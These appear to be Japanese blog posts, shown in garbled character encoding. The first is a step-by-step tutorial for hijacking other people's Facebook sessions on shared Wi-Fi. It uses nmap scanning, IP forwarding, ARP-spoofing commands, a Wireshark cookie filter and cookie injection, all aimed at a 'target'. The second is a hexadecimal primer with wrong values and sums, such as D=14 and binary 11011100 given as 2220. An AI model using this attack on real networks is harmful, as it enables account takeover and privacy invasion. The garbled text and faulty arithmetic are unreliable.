¤³¤³¤«¤éËÜʸ¤Ç¤¹
º£Æü¡¢»ä¤¿¤Á¤Ï¤¢¤Ê¤¿¤Î¥í¡¼¥«¥ë¥Í¥Ã¥È¥ï¡¼¥¯¾å¤ÎFacebook¥×¥í¥Õ¥£¡¼¥ë¤ò¥Ï¥Ã¥¯¤·¤Þ¤¹¡£¡Ö¤³¤ì¤Ï¤É¤¦Ìò¤ËΩ¤Ä¤Î¡©»ä°Ê³°¤Ïï¤â»ä¤Î¥Í¥Ã¥È¥ï¡¼¥¯¤ò»È¤ï¤Ê¤¤¤¸¤ã¤Ê¤¤¤«¡£¡×¤È»×¤¦¤«¤â¤·¤ì¤Þ¤»¤ó¡£¤¢¤Ê¤¿¤Ï̵ÎÁ¤ÇÍøÍѲÄǽ¤Ê¾¤ÎWi-Fi¥Í¥Ã¥È¥ï¡¼¥¯¾å¤Ç¤³¤ì¤ò»ÈÍѤ·¤Æ¡¢µ®½Å¤ÊFacebook¤Î¥×¥í¥Õ¥£¡¼¥ë¤ò¥¯¥é¥Ã¥¯¤¹¤ë¤³¤È¤¬¤Ç¤­¤Þ¤¹¡ª

¥¯¥¤¥Ã¥¯¥á¥â¡§¤¢¤Ê¤¿¤Î¥¿¡¼¥²¥Ã¥È¤¬±ÜÍ÷¤·¤Æ¤ë¾ì¹çư¤­¤Þ¤¹¡£¤½¤Î»þ¤Îhttp¡Êhttps¤Ç¤Ï¤¢¤ê¤Þ¤»¤ó¡Ë¤Î¾å¤ÎFacebook¤Ë¤è¤Ã¤Æ¥Ï¥Ã¥¯¤ò¹Ô¤Ã¤Æ¤¤¤Þ¤¹¡£

¤É¤¦¤ä¤Ã¤Æ¡©

»ä¤¿¤Á¤Ï¡Öcookie injection method¡×¤È¸Æ¤Ð¤ì¤ëͭ̾¤ÊÊýË¡¤ò»ÈÍѤ¹¤ë¤Ä¤â¤ê¤Ç¤¹¡£¤³¤ì¤Ï¡¢¡Ö¥¨¥ê¡¼¥È¡×¤«¤é±ó¤¯¤Ê¤ë¤Î¤«¤â¤·¤ì¤Þ¤»¤ó¤¬¡¢¤¢¤Ê¤¿¤ÏºÇ½é¤Ë¡¢Linux¥Ç¥£¥¹¥È¥ê¥Ó¥å¡¼¥·¥ç¥ó¤ËÀºÄ̤·¤Æ¼èÆÀ¤¹¤ëɬÍפ¬¤¢¤ê¤Þ¤¹¡£

¥¹¥Æ¥Ã¥×1¡§Àµ¤·¤¤ºàÎÁ¤ò¥²¥Ã¥È

¤³¤Î¥Ï¥Ã¥¯¤Ç¤Ï¡¢¤¤¤¯¤Ä¤«¤Î¤³¤È¤¬É¬Íפˤʤê¤Þ¤¹¡£Èà¤é¤Ï»ä¤¿¤Á¤¬É¬ÍפȤ¹¤ë¤Û¤È¤ó¤É¤¹¤Ù¤Æ¤ò»ý¤Ã¤Æ¤¤¤ë¤Î¤Ç»ä¤«¤é¤ÎºÇ¹â¤ÎÄó°Æ¤Ï¤¢¤Ê¤¿¤¬ºÇ½é¤ËBacktrack¡¢Kali¡¡Linux¡¢¤Þ¤¿¤ÏBugtraq¤ò¥¤¥ó¥¹¥È¡¼¥ë¤¹¤ë¤³¤È¤Ç¤¹¡£
¤³¤Î¾®¤µ¤Ê¼êÉʤ¿¤á¤Ë¡¢»ä¤¿¤Á¤ÏɬÍפˤʤê¤Þ¤¹¡§
  • ºî¶È¤ÎLinux¥Ç¥£¥¹¥È¥ê¥Ó¥å¡¼¥·¥ç¥ó¡ÊKali¡¢Backtrack¤äBugtraq¤¬¹¥¤Þ¤·¤¤¡Ë
  • Wireshark¤Î¡Ê¥Ñ¥±¥Ã¥È¥¹¥Ë¥Õ¥¡¡Ë
  • Firefox¡ÊWeb¥Ö¥é¥¦¥¶¡Ë
  • Nmap¡Ê¥¹¥­¥ã¥Ê¡Ë
  • Greasemonkey¡ÊFirefoxÍÑ¥¢¥É¥ª¥ó¡Ë
  • Cookie injector ¡ÊGreasemonkey¤Î¥¹¥¯¥ê¥×¥È¡Ë*
¤½¤ì¤Ç¤Ï¡¢¤¤¤¯¤Ä¤«¤Î¥Þ¥¸¥Ã¥¯¤ò¤ä¤Ã¤Æµ¯Æ°¤·¤Þ¤·¤ç¤¦​​¡ª¡§D *

¥¹¥Æ¥Ã¥×2¡§¥Í¥Ã¥È¥ï¡¼¥¯¥¹¥­¥ã¥ó

¤Þ¤º¡¢¼ÂºÝ¤Ë¥¿¡¼¥²¥Ã¥È¤ËÀܳ¤¹¤ë¤Ë¤Ï¡¢IP¥¢¥É¥ì¥¹¤¬É¬Íפˤʤê¤Þ¤¹¡£¤½¤ì¤òÆÀ¤ë¤¿¤á¤Ë¤Ï¡¢Nmap¤Ï¡¢¥Í¥Ã¥È¥ï¡¼¥¯¥¹¥­¥ã¥ó¤ò¹Ô¤¦É¬Íפ¬¤¢¤ê¤Þ¤¹¡£¤À¤«¤éÀè¤Ë¹Ô¤¯¤È¡¢¥¿¡¼¥ß¥Ê¥ë¤òµ¯Æ°¤·¡¢¼¡¤Î¥³¥Þ¥ó¥É¤òÆþÎϤ·¤Þ¤¹¡£
nmap -F 192.168.xx.xx/24
¤³¤Î¥³¥Þ¥ó¥É¤Ï¡¢¤½¤ì¤ËÀܳ¤µ¤ì¤¿Ç¤°Õ¤ÎIP¥¢¥É¥ì¥¹¤Ë¤Ä¤¤¤Æ¤Ï¡¢¥Í¥Ã¥È¥ï¡¼¥¯¤ò¥¹¥­¥ã¥ó¤·¤Þ¤¹¡£-F¤Ï¡Ö¹â®¥â¡¼¥É¡×¥³¥ó¥½¡¼¥ë¤ò»ÈÍѤ¹¤ë¤è¤¦¤Ë»Ø¼¨¤Ç¤­¤Þ¤¹¡£Àµ¤·¤¯¤Ç¤­¤Æ¤¤¤ì¤Ð¡¢¤³¤Î¤è¤¦¤Ê¤â¤Î¤¬É½¼¨¤µ¤ì¤ë¤Ï¤º¤Ç¤¹¡£

¥¹¥Æ¥Ã¥×3¡§man-in-the-middle¹¶·â¤Î³«»Ï

º£¡¢»ä¤¿¤Á¤Ï¡¢man-in-the-middle¹¶·â¡¢Î¬¤·¤ÆMITM¤ò³«»Ï¤¹¤ë¤Ä¤â¤ê¤À¡£
MITM¹¶·â¤Ï¡¢¹¶·â¤¬»ä¤¿¤Á¤ÎMAC¥¢¥É¥ì¥¹¤òµ¶Áõ¤·¤¿¤¢¤ë¥µ¡¼¥Ð¡¼/±þÅú¼Ô¤¬Áê¸ß¤Ë¥á¥Ã¥»¡¼¥¸¤òÁ÷¿®¤·¤¿¤È¤­¤Ë¡¢  Èà¤Ï¡¢¤½¤Î¥á¥Ã¥»¡¼¥¸¤ò¼õ¿®¤·¤¿¤³¤È¤Ï¤¢¤ê¤Þ¤»¤ó Èà¤Ï»ä㤬man-in-the-middle¹¶·â¤·¤Æ»ä¤¿¤Á¤Ï¡¢Á÷¿®¤·¤¿¥á¥Ã¥»¡¼¥¸¤ò¼õ¿®¤·¤Þ¤¹¡£
man-in-the-middle¹¶·â¡ª

¹¶·â¤Î³«»Ï

³«»Ï¤¹¤ë¤Ë¤Ï¡¢¿·¤·¤¤¥¿¡¼¥ß¥Ê¥ë¥¦¥£¥ó¥É¥¦¤Ç¼¡¤Î¥³¥Þ¥ó¥É¤òÆþÎϤ·¤Þ¤¹¡£
sudo echo 1 >> /proc/sys/net/ipv4/ip_forward
¤³¤ì¤Ï¤¢¤Ê¤¿¤ÎIP¥¢¥É¥ì¥¹¤òžÁ÷¤·¤Þ¤¹¡£º£¡¢»ä¤¿¤Á¤Ï¡¢¿·¤·¤¤Ã¼Ëö¥¦¥£¥ó¥É¥¦¤ò³«¤­¡¢¼¡¤Î¥³¥Þ¥ó¥É¤òÆþÎϤ·¤ÆMITM¤ò³«»Ï¤·¤Þ¤¹¡£
sudo arpspoof -i [Interface] -t [target] [default gateway]
¤¢¤Ê¤¿¤Î¥¤¥ó¥¿¡¼¥Õ¥§¥¤¥¹¤È¥Ç¥Õ¥©¥ë¥È¥²¡¼¥È¥¦¥§¥¤¤¬¤ï¤«¤é¤Ê¤¤¾ì¹ç¤Ï¡¢¿·¤·¤¤Ã¼Ëö¤òµ¯Æ°¤·¡¢¼¡¤Î¤è¤¦¤ËÆþÎϤ·¤Þ¤¹¡£
¿·¤·¤¤Ã¼Ëö¥¦¥£¥ó¥É¥¦¤ò³«¤¤¤Æ¡Ê¤â¤¦°ìÅÙ-_-¡Ë¤Ï¡¢¼¡¤Î¥³¥Þ¥ó¥É¤òÆþÎϤ·¤Þ¤¹¡£
sudo arpspoof -i [interface] -t [default gateway] [target]

Ãí¡§Î¾Êý¤Îarpspoof¤Î¥³¥Þ¥ó¥É¤¬ÆþÎϤµ¤ì¤¿¸å¡¢¥¿¡¼¥ß¥Ê¥ë¤òÊĤ¸¤Ê¤¤¤Ç¤¯¤À¤µ¤¤¡£

¥¹¥Æ¥Ã¥×4¡§Firefox¤ÈWireshark¤Î¡Ê¤Û¤Ü´°Î»¡ª¡Ë

»ä¤¿¤Á¤Ï¡¢¤³¤Î¥Ï¥Ã¥¯¤ò´°Î»¤¹¤ë¤¿¤á¤Ë¤¤¤¯¤Ä¤«¤Î¤è¤ê¿¤¯¤Î¤â¤Î¤¬É¬ÍפǤ¹¡ª
¤Þ¤º¡¢Firefox¤ò¥¤¥ó¥¹¥È¡¼¥ë¡¢
¤½¤Î¸åGreasemonkey¤È¥¯¥Ã¥­¡¼¥¤¥ó¥¸¥§¥¯¥¿¥¹¥¯¥ê¥×¥È¡£¤½¤Î¸å¡¢Wireshark¤ò¥¤¥ó¥¹¥È¡¼¥ë¤·¤Þ¤¹¡£¥¿¡¼¥ß¥Ê¥ë¥¦¥£¥ó¥É¥¦¤Ë¼¡¤Î¥³¥Þ¥ó¥É¤òÆþÎϤ¹¤ë¤³¤È¤Ë¤è¤Ã¤Æ¹Ô¤¦¤³¤È¤¬¤Ç¤­¤Þ¤¹¡£
sudo apt-get install wireshark
¤½¤Î¸å¡¢¤¢¤Ê¤¿¤Î¥¤¥ó¥¿¡¼¥Õ¥§¥¤¥¹¤òÁªÂò¤·¤Æ¡¢¥­¥ã¥×¥Á¥ã¤ò³«»Ï¡£¾åÉô¤Ë¤Ï¡¢¤¢¤Ê¤¿¤¬¥Õ¥£¥ë¥¿¤òÄɲ乤뤳¤È¤¬¤Ç¤­¤Þ¤¹ÆþÎϥܥ寥¹¤¬É½¼¨¤µ¤ì¤ë¤Ï¤º¤Ç¤¹¡£º£¡¢¤³¤Î¥Õ¥£¥ë¥¿¤òÆþÎϤ·¤Þ¤¹¡£
http.cookie contains DATR
¤³¤ì¤Ç¡¢Wireshark¤Î¥ê¥¹¥È¤ò¼èÆÀ¤¹¤ëɬÍפ¬¤¢¤ê¤Þ¤¹¡£¥Æ¥­¥¹¥ÈGET¤¬´Þ¤Þ¤ì¤Æ¤¤¤ë¥¯¥Ã¥­¡¼¤ò¸¡º÷¤·¤Þ¤¹¡£¤½¤ì¤ò¸«¤Ä¤±¤Æ¡¢¥Þ¥¦¥¹¤Îº¸¥Ü¥¿¥ó¤ÇÁªÂò¤·¤Æ¥³¥Ô¡¼¤ò¥¯¥ê¥Ã¥¯¤·¤Æ¡¢¥Ð¥¤¥È¤òÁªÂò¤·¡¢°õºþ²Äǽ¤Ê¥Æ¥­¥¹¥È¤òÁªÂò¤·¤Þ¤¹¡£
º£Wireshark¤Î¤Ë¹Ô¤¯¤ÈFacebook¤Ë¥¢¥¯¥»¥¹¤·¤Æ¤¯¤À¤µ¤¤¡£¤¢¤Ê¤¿¤¬¥í¥°¥¤¥ó¤·¤Æ¤¤¤Ê¤¤¤³¤È¤ò³Îǧ¤·¤Æ¤¯¤À¤µ¤¤¡£¼¡¤Ë¡¢Facebook¥í¥°¥¤¥ó¥Ú¡¼¥¸¤ËÌá¤Ã¤Æ¡¢[ALT]+C¤ò²¡¤·¤Æ¡¢¥¯¥Ã¥­¡¼¤òŽ¤Ã¤Æ¤¯¤À¤µ¤¤¡£

»ä¤ÎºÇ½ªÅª¤Ê¥³¥á¥ó¥È

¤³¤Î¥Ï¥Ã¥¯¤Ï¡¢¹âÅ٤˸«¤¨¤ë¤«¤â¤·¤ì¤Þ¤»¤ó¤¬¡¢¤½¤ì¤Ï¼ÂºÝ¤Ë¤ÏËÜÅö¤Ë´Êñ¤Ç¤¹¡£¤¢¤Ê¤¿¤Ï¤¹¤Ù¤Æ¤Î¼ê½ç¤òÂÇÇˤ¹¤ë¤È¡¢¤½¤ì¤Ï¥±¡¼¥­¤Î°ìÉô¤Ç¤¹¡ª¡§D
Facebook¤Î¥»¥­¥å¥ê¥Æ¥£¤¬Èó¾ï¤Ë¶¯ÎϤǤϤʤ¤¤³¤È¤ÏÌÀ¤é¤«¤Ç¤¹¡£:P
Á°¥Ö¥í¥°¤è¤ê

¤³¤Îµ­»ö¤Ë

³«¤¯¥³¥á¥ó¥È¡Ê0¡Ë¢¨Åê¹Æ¤µ¤ì¤¿¥³¥á¥ó¥È¤Ï¥Ö¥í¥°³«À߼ԤξµÇ§¸å¤Ë¸ø³«¤µ¤ì¤Þ¤¹¡£

³«¤¯¥È¥é¥Ã¥¯¥Ð¥Ã¥¯¡Ê0¡Ë¢¨¥È¥é¥Ã¥¯¥Ð¥Ã¥¯¤Ï¥Ö¥í¥°³«À߼ԤξµÇ§¸å¤Ë¸ø³«¤µ¤ì¤Þ¤¹¡£

16¿Ê¿ô¤Ï¥³¥ó¥Ô¥å¡¼¥Æ¥£¥ó¥°¤ÎÁ´ÂΤˤ錄¤Ã¤Æ»ÈÍѤµ¤ì¤Þ¤¹¡£¤Þ¤¿¡¢¤¢¤Ê¤¿¤¬¤³¤ÎBase16 numering¥·¥¹¥Æ¥à¤ò¸¡Æ¤¤·¤Æ¤¤¤Ê¤±¤ì¤Ð¡¢¤½¤ì¤ÏÈæ³ÓŪÉÔÆ©ÌÀ¤Ë¸«¤¨¤ë¤«¤â¤·¤ì¤Þ¤»¤ó¡£»ä¤Ï16¿Ê¿ô¤Î¾Ò²ð¤ÈÈֹ楷¥¹¥Æ¥à¤Î³µÍפòÊû¤²¤Þ¤¹¡£

¤¢¤Ê¤¿¤Ï¥³¥ó¥Ô¥å¡¼¥¿¤È¥½¥Õ¥È¥¦¥§¥¢¤òÄ̤·¤Æ16¿Ê¿ô¤òÈò¤±¤Æ¤ÏÄ̤ì¤Ê¤¤»ö¤òÃΤäƤë¤Ç¤·¤ç¤¦¡£¤½¤ì¤Ï¡¢Ä̾盧¤Î0x4D¤Þ¤¿¤Ï4D¤Ë¸«¤¨¤Þ¤¹¡£¤½¤ì¤Ï¿¤¯¤Î¾ì¹ç¡¢¤½¤Î´ñ̯¤Ê0x¤Ç»Ï¤Þ¤ê¡¢ÂèÆó¤Ë¡¢¤½¤³¤Îʸ»ú¤À¤±¤Ç¤Ê¤¯¿ô»ú¡Ê0〜9¡Ë¤¬¤¢¤ë¤Î¤Ç¡¢²¿¤«¤¬¤³¤³¤Ë°Û¤Ê¤Ã¤Æ¤¤¤ë¤Èǧ¼±¤·¤Æ¤¤¤Þ¤¹¡£Î㤨¤Ð¡¢²æ¡¹¤Ï²¼¤Î¤è¤¦¤Ê¥Ç¥¸¥¿¥ë¥Õ¥©¥ì¥ó¥¸¥Ã¥¯¤Ç¡¢¥Ï¡¼¥É¥Ç¥£¥¹¥¯¥¤¥á¡¼¥¸¤Ç16¿Ê¿ô¤Ë¤·¤Ð¤·¤ÐÁø¶ø¤·¤Þ¤¹;

¤Þ¤¿¤Ï¡¢Wireshark¤ò»È¤Ã¤Æ¤¤¤ë¤È¤­¡¢²æ¡¹¤Ï16¿Ê¿ô¤ËÁø¶ø¤¹¤ë¤«¤â¤·¤ì¤Þ¤»¤ó;
¤½¤·¤Æ²æ¡¹¤Ï°Ê²¼¤Ë¤½¤Î¤è¤¦¤ËSnort¤Î¤è¤¦¤Ë»ä¤¿¤Á¤ÎIDS·Ù¹ð¤òÆÉ¤ó¤Ç16¿Ê¿ô¤ËÁø¶ø¤¹¤ë²ÄǽÀ­¤¬Èó¾ï¤Ë¹â¤¤¤Ç¤¹¡£
¤¹¤Ù¤Æ¤ÎNIC¤Î¥Í¥Ã¥È¥ï¡¼¥¯¥Ç¥Ð¥¤¥¹¾å¤Ç»ä¤¿¤Á¤ÎMAC¥¢¥É¥ì¥¹¤Ë£±£¶¿Ê¿ô¤¬É¾²Á¤µ¤ì¤Æ¤¤¤Æ¡¢¤½¤ì¤¬¹­¤¯ºÎÍѤµ¤ì¤ë¤È¡¢IPv6¤Î¤¹¤Ù¤Æ¤Î£±£¶¿Ê¿ô¤Ë¤Ê¤ê¤Þ¤¹¡£

£±£¶¿Ê¿ô¤Ë´·¤ì¤Æ¤¤¤Ê¤¤¤Ê¤é¡¢Íý²ò¤¹¤ë¤Þ¤Ç¤Ë»þ´Ö¤¬¤«¤«¤ë¤Ç¤·¤ç¤¦¡£¤½¤Î»þ´Ö¤Ï¤ª¤½¤é¤¯¸å¤Ç¤·¤Ð¤é¤¯Æ¬Äˤ¬¤¹¤ë¤Ç¤·¤ç¤¦¡£

¿Ê¿ô

Base16¤Þ¤¿¤Ï16¿Ê¤Î¥·¥¹¥Æ¥à¤òÍý²ò¤¹¤ë¤è¤¦¤Ë¤Ê¤ëºÇÁ±¤ÎÊýË¡¤Î1¤Ä¤Ï¡¢¤¢¤Ê¤¿¤¬Èó¾ï¤Ë¤è¤¯ÃΤäƤ¤¤ëÈÖ¹æÉÕ¤±¥·¥¹¥Æ¥à¤Î´ðËÜ¡¢Base10¤Þ¤¿¤Ï½½¿ÊË¡¤ËÌá¤ë¤³¤È¤Ç¤·¤ç¤¦¡£¤½¤Î¥·¥¹¥Æ¥à¤Ç¤Ï¡¢10·å¡Ê0〜9¡Ë¤òÍ­¤·¡¢¤½¤Î¥·¥¹¥Æ¥àÆâ¤Î³ÆÎ󤬤½¤Î±¦Â¦¤Ë1¤è¤ê¤â10ÇÜÂ礭¤¤Ãͤòɽ¤¹¡£¤À¤«¤é¡¢Î㤨¤Ð¡§

7¡Ê1¡Ë
3¡¡10¡Ê10¡Ë
3  100(100¡Ë
1 1000(1000)
3 10000(10000)
¥×¥ì¡¼¥¹¥Û¡¼¥ë¥À¡¼¤Ï¤½¤ì¤¾¤ìÁ°¤Î¤â¤Î¤è¤ê10ÇÜÂ礭¤¤¤Ç¤¹¡£
16¿Ê¿ô¤ÏƱÍͤ˵¡Ç½¤·¤Þ¤¹¤¬¡¢³Æ¡¹¤Î¥³¥é¥à¤ÏÁ°¤Î¥³¥é¥à¤è¤ê16ÇÜÂ礭¤¤¤Ç¤¹¡£
¤½¤Î¤¿¤á¡¢ºÇ½é¤Î4¤Ä¤ÎÏ»³ÑÃì¤Ï¼¡¤Î¤è¤¦¤ËÃͤ¬​​ÀßÄꤵ¤ì¤Æ¤¤¤Þ¤¹¡£
4096 256 16 1

¥«¥é¥à¤è¤ê16ÇÜÂ礭¤Ê¾ì¹ç¡£
£±£¶¿Ê¿ô¥Ê¥ó¥Ð¥ê¥ó¥°¥·¥¹¥Æ¥à

¿Ê¿ô¤Ï¡¢base16Èֹ楷¥¹¥Æ¥à¤Ç¤¹¡£10¿Ê¿ô¤Þ¤¿¤ÏBase10¥·¥¹¥Æ¥à¤Î¤è¤¦¤Ë¡¢¿Ê¿ô¤Ï¡¢¤¢¤é¤æ¤ë²ÄǽÀ­¤ò¥«¥Ð¡¼¤¹¤ë¤¿¤á¤Ë16·å¤Î¿ô»ú¤ò»ý¤Ã¤Æ¤¤¤ëɬÍפ¬¤¢¤ê¤Þ¤¹¡£»Äǰ¤Ê¤¬¤é¡¢²æ¡¹¤Ï¡Ê0-9¡Ë¤Çưºî¤¹¤ë¤è¤¦¤Ë10¤ò»ý¤Ã¤Æ¤¤¤ë¤Î¤Ç¡¢²æ¡¹¤Ï6°Ê¾å¤òÄɲ乤ëɬÍפ¬¤¢¤ê¤Þ¤¹¡£¥³¥ó¥Ô¥å¡¼¥¿¶È³¦¤Ï¡¢¤³¤ì¤é¤ÎÄɲäÎÃͤòɽ¸½¤¹¤ë¤¿¤á¤Îʸ»ú¡¢AF¤ò»ÈÍѤ¹¤ë¤³¤È¤ò·èÄꤷ¤Þ¤·¤¿¡£¤³¤ì¤¬¿Ê¥·¥¹¥Æ¥à¤Ï¡¢°Ê²¼¤ÎÃͤò»ý¤Ä¤³¤È¤ò°ÕÌ£¤·¤Þ¤¹
0 = 01= 12 = 23 = 34 = 45 = 56 = 67 = 78 = 89 = 9A = 10B = 11C = 12D = 13E = 14F = 15

Î㤨¤Ð²æ¡¹¤¬¿ô¤Î16¿Êɽ¸½¤ò¸«¤ë¤È¤­¡¢¤³¤ì¤Ï²¼µ­¤ò°ÕÌ£¤·¤Þ¤¹¡£
0x45

²æ¡¹¤Ï¡¢ÂèÆó​​Îó¤Ï16¿Ê¿ô¤Ç¤Ï¤Ê¤¯10¿Ê¿ô¤òɽ¤·½ü¤¤¤Æ10¿Ê¿ô¤Ë¤âƱÍͤËɾ²Á¤¹¤ë¤³¤È¤¬¤Ç¤­¤Þ¤¹¡£¤³¤ì¤Ï¥Ø¥¯¥¹¤Ë0x45¤¬°Ê²¼¤Î¤è¤¦¤Êɾ²Á¤¹¤ë¤³¤È¤¬¤Ç¤­¤ë¤³¤È¤ò°ÕÌ£¤·¤Þ¤¹;
5 x 1 = 54 x 16 = 64---------------=69

²æ¡¹¤Ï¤³¤Î¤è¤¦¤ÊDE¤Ê¤É¤Î16¿Ê¿ô¤ò»ý¤Ã¤Æ¤¤¤ë¤Ê¤é¡¢¤½¤ÎÃͤϤ³¤Î¤è¤¦¤Ë·×»»¤¹¤ë¤³¤È¤¬¤Ç¤­¤Þ¤¹¡£
D¤Ï¡¢14¡ß1 = 14¤òɽ¤¹
E¤Ï15¡ß16 = 240¤òɽ¤¹
------------------------------------ - 
= 254

¤Ê¤¼²æ¡¹¤Ï£±£¶¿Ê¿ô¤ò»ÈÍѤ¹¤ë¤Î¤«

¥³¥ó¥Ô¥å¡¼¥Æ¥£¥ó¥°¤Ç¤Ï¡¢¥Ó¥Ã¥È¤Ï¡¢Â¿¤¯¤Î¾ì¹ç¡¢0¤Þ¤¿¤Ï1¤Ç¼¨¤µ¤ì¤ëñ°ì¤Î¥ª¥ó/¥ª¥Õ¥¹¥¤¥Ã¥Á¤Ç¤¢¤ë¡£¥³¥ó¥Ô¥å¡¼¥Æ¥£¥ó¥°¤Ç¤Ï¡¢¥Ó¥Ã¥È¤Ï¡¢0¤Þ¤¿¤Ï1¤Ä¤Þ¤Ç¤Ë¤·¤Ð¤·¤Ðɽ¤ï¤µ¤ì¤ëñ°ì¤ÎÅŸ»¥¹¥¤¥Ã¥Á¤Ç¤¹¡£

1¥Ð¥¤¥È¤Ï0000 0000¤Ë¤è¤Ã¤ÆÉ½¤ï¤µ¤ì¤Þ¤¹¡£Â¿¤¯¤Î¾ì¹ç8¥Ó¥Ã¥È¤Ç¤¹¡£
¤½¤ì¤¬¤«¤Ä¤Æ¤Ï¾¤Î¿¤¯¤Î¤â¤Î¤ÎÃæ¤Ë¡¢IP¥¢¥É¥ì¥¹¤ÇASCIIʸ»ú¤¢¤ë¤¤¤Ïñ°ì¤Î¥ª¥¯¥Æ¥Ã¥È¤ò¤·¤Ð¤·¤Ðɽ¤ï¤·¤¿¤È¤È¤â¤Ë¡¢1¥Ð¥¤¥È¤Ï¥³¥ó¥Ô¥å¡¼¥Æ¥£¥ó¥°Ãæ¤Î½ÅÍפʥæ¥Ë¥Ã¥È¤Ç¤¹¡£

»ä¤¿¤Á¤ÎIPv4¥¢¥É¥ì¥¹¤Ç¡¢³Æ¥ª¥¯¥Æ¥Ã¥È¡Ê¥Ð¥¤¥È¡Ë¤Ï0¤«​​¤é255¤Þ¤Ç¤ÎÃÍ¡¢255.255.255.0¤Î¥Í¥Ã¥È¥Þ¥¹¥¯¤Ê¤É192.168.0.254¤ò»ý¤Ã¤Æ¤¤¤ëÍýͳ¤Ç¤¹¡£
¤Û¤È¤ó¤É¤Î¿Í´Ö¤Ï¡¢²æ¡¹¤Î¥³¥ó¥Ô¥å¡¼¥¿¥·¥¹¥Æ¥à¤Î´ðÁäȤʤëBase2¤ò¥·¥¹¥Æ¥à¤Ç¤Îºî¶È¤Ë¶ìÏ«¤¹¤ë¡£BASE2ÈÖ¹æ¤Ï¼¡¤Î¤è¤¦¤Ëɽ¸½¤µ¤ì¤ë¤³¤È¤¬¤¢¤ê¤Þ¤¹¡£
1101 1100

¤³¤ÎÈֹ椬¾®¿ô¤Ç2220¤òɽ¤·¤Þ¤¹¤¬¡¢¾®¿ô¤Ø¤Îž´¹¤Ïñ½ã¤Ç¤Ê¤¤¤«intutive¤Ç¤¢¤ê¤Þ¤»¤ó¡£¿Ê¿ô¤Ï¡¢2·å¤ÎHexÃͤâ0¤«¤é255¤Þ¤Ç¤ÎÈϰϤȤ·¤Æ¡¢»ä¤¿¤Á¤Ï¤Á¤ç¤¦¤É2·å¤Îñ°ì¥Ð¥¤¥È¤ÎÃͤòɽ¤¹¤³¤È¤¬¤Ç¤­¤Þ¤¹¡£

£±£¶¿Ê¿ô¤ÏBase2¥·¥¹¥Æ¥à¤è¤ê¥³¥ó¥Ñ¥¯¥È¤Ç¤¹¡£¤Þ¤¿¡¢¤½¤ì¤ÏBase2¤è¤ê¤â¤à¤·¤í½½¿ÊË¡¤Î¤è¤¦¤ËÈó¾ï¤Ë¸«¤¨¤Æ¡¢ºîÍѤ·¤Þ¤¹¡£¥Ð¥¤¥È¤Çɽ¸½¤¹¤ë¤³¤È¤¬¤Ç¤­¤ë¤¹¤Ù¤Æ¤ÎÃͤ¬0x00¤Î´Ö¤ÎÃͤÇɽ¤¹¤³¤È¤¬¤Ç¤­¤Þ¤¹¡£

£±£¶¿Ê¿ô

¤ª¤½¤é¤¯£±£¶¿Ê¿ô¤ò¹Ô¤¦ºÇ¤â´Êñ¤ÊÊýË¡¤Ï¡¢¤¹¤Ù¤Æ¤ÎWindows¥·¥¹¥Æ¥à¤ËÁȤ߹þ¤Þ¤ì¤Æ¤¤¤ë·×»»µ¡¤ò»ÈÍѤ¹¤ë¤³¤È¤Ç¤¹¡£²¼µ­¤Î¤è¤¦¤ÊWindows¤ÎÅÅÂî¤ò³«¤­¤Þ¤¹¡£
º£¡¢°ìÈÖ¾å¤Ë¤¢¤ë[show]¥á¥Ë¥å¡¼¤Ë°Üư¤·¡¢¥×¥í¥°¥é¥Þ¤òÁªÂò¤·¤Þ¤¹¡£
ÅÅÂî¤Îº¸Â¦¤Ë¸«¤ÆÊ¬¤«¤ë¤è¤¦¤Ë¡¢4¡¢hex(16¿Ê¿ô¡Ë¡¢ Dec, Oct, Bin¤¬¤¢¤ê¤Þ¤¹¡£¥Ç¥Õ¥©¥ë¥È¤Ç¤Ï¡¢Dec¤Þ¤¿¤ÏDecimal¤¿¤Á¤Î¤ª¤Ê¤¸¤ß¤ÎBase10¥·¥¹¥Æ¥à¤ËÀßÄꤹ¤ëɬÍפ¬¤¢¤ê¤Þ¤¹¡£»ä¤ÏhexademimalÈÖ¹æ¤òÆþÎϤ·¤¿¤¤¾ì¹ç¤Ï¡¢Ã±½ã¤Ëhex¤ò¥¯¥ê¥Ã¥¯¤·¡¢ÈÖ¹æ¤òÆþÎϤ·¤Þ¤¹¡£
¤½¤Î¸å¡¢»äã¤ÏDec¥Ü¥¿¥ó¤ËÀÚ¤êÂØ¤¨¤ë¤³¤È¤¬¤Ç¤­¡¢¤½¤ì¤ò10¿Ê¿ô¤Ë16¿Ê¿ô¤òÊÑ´¹¤·¤Þ¤¹¡£
ºÇ¸å¤Ë¡¢£±£¶¿Ê¿ô¤Ë²Ã»»¤«¡¢¸º»»¤ò¤¹¤ë¤«¡¢¾è»»¤¹¤ë¤«¡¢½ü»»¤·¤¿¤±¤ì¤Ð¡¢»ä¤¿¤Á¤ÏÅÅÂî¤ÎÃæ¤ÇƱÍÍ¤Ë¥×¥í¥°¥é¥Þ»ë³¦¤ò»ÈÍѤ¹¤ë¤³¤È¤¬¤Ç¤­¤Þ¤¹¡£
¤Ä¤Þ¤ê¡¢²æ¡¹¤Ïñ½ã¤Ë·×»»µ¡¤Ë¤ª¤¤¤Æ²Ã»»¡Ê+¡Ë¤ò¡¢DE¤òÆþÎϤ·¤Æ¤«¤é¡¢A5¤òÆþÎϤ·¤ÆÅù¤·¤¤²¡¤·¡¢16¿ÊÃÍA5¤Ë16¿ÊÃͤÎDE¤òÄɲä·¤¿¤¤¤Ç¤¹¡£·ë²Ì¤Ï183¤Ë¤Ê¤ê¤Þ¤¹¡£
¤½¤·¤Æ¡¢Dec¥Ü¥¿¥ó¤ËÀÚ¤êÂØ¤¨¤Æ¡¢10¿Ê¿ô¤ËÁêÅö¤Þ¤¿¤Ï387¤òÆÀ¤ë¤³¤È¤¬¤Ç¤­¤Þ¤¹¡£

¤³¤Îµ­»ö¤Ë

³«¤¯¥³¥á¥ó¥È¡Ê0¡Ë¢¨Åê¹Æ¤µ¤ì¤¿¥³¥á¥ó¥È¤Ï¥Ö¥í¥°³«À߼ԤξµÇ§¸å¤Ë¸ø³«¤µ¤ì¤Þ¤¹¡£

³«¤¯¥È¥é¥Ã¥¯¥Ð¥Ã¥¯¡Ê0¡Ë¢¨¥È¥é¥Ã¥¯¥Ð¥Ã¥¯¤Ï¥Ö¥í¥°³«À߼ԤξµÇ§¸å¤Ë¸ø³«¤µ¤ì¤Þ¤¹¡£

SMTP

